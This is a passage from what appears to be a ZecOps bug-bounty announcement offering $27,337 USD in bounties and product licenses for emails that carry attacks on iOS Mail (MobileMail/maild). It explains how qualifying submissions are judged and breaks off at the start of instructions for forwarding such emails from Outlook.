We will determine what were the first two valid submissions according to the date they were received in our email server and if they contain an exploit code. A total of $27,337 USD in bounties and licenses of ZecOps Gluon & Neutrino.
For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.
Please note: Not every email that causes the symptoms above and shared with us will qualify for a bounty as there could be other bugs in MobileMail/maild – we’re only looking for ones that contain an attack.
How to send the emails using Outlook :
Open Outlook from a computer and locate the relevant email